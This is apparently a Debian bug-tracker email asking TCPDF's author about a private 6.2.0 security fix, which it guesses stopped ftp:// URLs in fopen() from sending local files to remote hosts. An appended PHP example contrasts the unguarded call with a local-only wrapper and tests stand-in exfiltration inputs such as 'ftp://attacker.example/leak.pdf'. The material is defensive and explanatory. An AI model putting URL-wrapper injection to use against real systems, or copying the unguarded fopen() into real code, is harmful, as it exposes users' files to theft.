Hi,

CCing upstream author for confirmation. Nicola we are trying to understand
what security fix went into tcpdf 6.2.0. The bug is private on
sourceforge, could you make it public now?

For more details see: https://bugs.debian.org/814030

On Wed, 04 Jan 2017, David Prévot wrote:
> >> Can you contact upstream for information on this security bug? I have
> >> no idea what that could possibly mean.
> > 
> > Did you get any information on that from upstream? The bug is still
> > closed, so it does not really help.

I did not contact upstream but looking at the changes in that version:
https://sourceforge.net/p/tcpdf/code/ci/40662daa766bd3a6b5eafa44dfde680ee6661716/tree/tcpdf.php?diff=3d5921442e7adde1ce225104118bc246a1933c65
https://sourceforge.net/p/tcpdf/code/ci/40662daa766bd3a6b5eafa44dfde680ee6661716/tree/include/tcpdf_fonts.php?diff=3d5921442e7adde1ce225104118bc246a1933c65
https://sourceforge.net/p/tcpdf/code/ci/40662daa766bd3a6b5eafa44dfde680ee6661716/tree/include/tcpdf_static.php?diff=3d5921442e7adde1ce225104118bc246a1933c65

I see calls to fopen() being replaced by TCPDF_STATIC::fopenLocal(), which
ensures that we pass only a "file://" URL, or adds this prefix
if there's no "://" in the string.

So I guess that this issue is related to this. All the fopen() calls are
for files to which we write, so I guess that we can possibly inject an
"ftp://" URL in some parameters and get some local files sent to a remote
location.

Cheers,
-- 
Raphaël Hertzog ◈ Debian Developer

Support Debian LTS: http://www.freexian.com/services/debian-lts.html
Learn to master Debian: http://debian-handbook.info/get/
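The pattern described in the message above, as an added example rather than TCPDF's own code: the unguarded fopen() on a caller-controlled path, next to a local-only wrapper modelled on the behaviour attributed to TCPDF_STATIC::fopenLocal() (accept "file://" URLs, prefix "file://" when no "://" is present, refuse everything else). The function names write_unguarded, fopen_local_only, write_guarded and demo, and the sample paths, are assumptions made for this illustration.

```php
<?php
// Added example (not TCPDF's code). Names and sample inputs are assumptions.

// Before the fix: the path comes straight from a parameter. With
// allow_url_fopen=On, a value such as "ftp://attacker.example/leak.pdf"
// selects PHP's ftp:// stream wrapper, so fopen(..., 'wb') opens a remote
// file for writing and whatever the library writes lands on that host.
function write_unguarded(string $path, string $data)
{
    $fp = fopen($path, 'wb');
    if ($fp === false) {
        return false;
    }
    $written = fwrite($fp, $data);
    fclose($fp);
    return $written;
}

// After the fix: pin scheme-less paths to file:// and accept only file://,
// so the caller can no longer pick a different stream wrapper.
function fopen_local_only(string $filename, string $mode)
{
    if (strpos($filename, '://') === false) {
        // Plain path: force the local-file wrapper explicitly.
        $filename = 'file://' . $filename;
    } elseif (stripos($filename, 'file://') !== 0) {
        // ftp://, http://, php://, phar://, ... are all refused.
        return false;
    }
    return fopen($filename, $mode);
}

function write_guarded(string $path, string $data)
{
    $fp = fopen_local_only($path, 'wb');
    if ($fp === false) {
        return false;
    }
    $written = fwrite($fp, $data);
    fclose($fp);
    return $written;
}

// Constructed inputs run through the guard; returns one outcome per case.
function demo(): array
{
    $local = tempnam(sys_get_temp_dir(), 'tcpdf-demo-');
    $cases = [
        'plain local path'   => $local,
        'explicit file://'   => 'file://' . $local,
        'ftp exfiltration'   => 'ftp://attacker.example/leak.pdf',
        'http wrapper'       => 'http://attacker.example/leak.pdf',
        'php://output'       => 'php://output',
        'case-varied scheme' => 'FTP://attacker.example/leak.pdf',
    ];
    $results = [];
    foreach ($cases as $label => $path) {
        $r = write_guarded($path, "%PDF-1.4\n");
        $results[$label] = ($r === false) ? 'refused' : "wrote {$r} bytes locally";
    }
    unlink($local);
    return $results;
}

foreach (demo() as $label => $outcome) {
    printf("%-20s %s\n", $label, $outcome);
}
```

Two caveats when reading the guard: it only controls which stream wrapper is selected, not where on the local filesystem the path points, so directory traversal in a caller-controlled path still has to be handled separately; and PHP's file:// wrapper expects an absolute path, so the prefixing step is only safe for paths that are already absolute, which is what the temp-file cases above use.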